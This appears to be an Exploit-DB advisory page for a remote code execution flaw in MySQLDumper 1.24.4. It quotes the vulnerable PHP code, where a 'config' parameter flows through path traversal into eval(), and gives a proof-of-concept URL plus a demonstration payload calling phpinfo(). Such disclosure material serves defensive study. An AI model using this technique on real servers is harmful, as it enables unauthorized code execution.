880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
80 lines
No EOL
2.6 KiB
PHP
80 lines
No EOL
2.6 KiB
PHP
source: https://www.securityfocus.com/bid/53310/info
|
|
|
|
MySQLDumper is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
|
|
|
|
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
|
|
|
|
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
|
|
|
Vulnerable code section:
|
|
/*
|
|
//menu.php
|
|
if (isset($_POST['selected_config'])||isset($_GET['config']))
|
|
{
|
|
if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
|
|
// Configuration was switched in content frame?
|
|
if (isset($_GET['config'])) $new_config=$_GET['config'];
|
|
// restore the last active menuitem
|
|
if (is_readable($config['paths']['config'].$new_config.'.php'))
|
|
{
|
|
clearstatcache();
|
|
unset($databases);
|
|
$databases=array();
|
|
if (read_config($new_config))
|
|
{
|
|
$config['config_file']=$new_config;
|
|
$_SESSION['config_file']=$new_config; //$config['config_file'];
|
|
$config_refresh='
|
|
<script language="JavaScript" type="text/javascript">
|
|
if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
|
|
{
|
|
var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
|
|
}
|
|
else selected_div=\'\';
|
|
parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&sel=\'+selected_div</script>';
|
|
}
|
|
if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern
|
|
}
|
|
}
|
|
|
|
|
|
|
|
*/
|
|
As you can see we can traverse it +
|
|
|
|
if we will look to read_config() function
|
|
//inc/functions_global.php
|
|
|
|
function read_config($file=false)
|
|
{
|
|
global $config,$databases;
|
|
$ret=false;
|
|
if (!$file) $file=$config['config_file'];
|
|
// protect from including external files
|
|
$search=array(':', 'http', 'ftp', ' ');
|
|
$replace=array('', '', '', '');
|
|
$file=str_replace($search,$replace,$file);
|
|
|
|
if (is_readable($config['paths']['config'].$file.'.php'))
|
|
{
|
|
// to prevent modern server from caching the new configuration we need to evaluate it this way
|
|
clearstatcache();
|
|
$f=implode('',file($config['paths']['config'].$file.'.php'));
|
|
$f=str_replace('<?php','',$f);
|
|
$f=str_replace('?>','',$f);
|
|
eval($f);
|
|
$config['config_file']=$file;
|
|
$_SESSION['config_file']=$config['config_file'];
|
|
$ret=true;
|
|
}
|
|
return $ret;
|
|
}
|
|
|
|
this means remote attacker can iterate his/her code as PHP.(Notice: eval($f))
|
|
|
|
Our exploit:
|
|
http://www.example.com/learn/cubemail/menu.php?config=../../ss
|
|
where ss = ss.php
|
|
#cat ss.php # in eg attacker uploaded his/her own file:
|
|
echo 'Our command executed ' . getcwd();
|
|
phpinfo(); |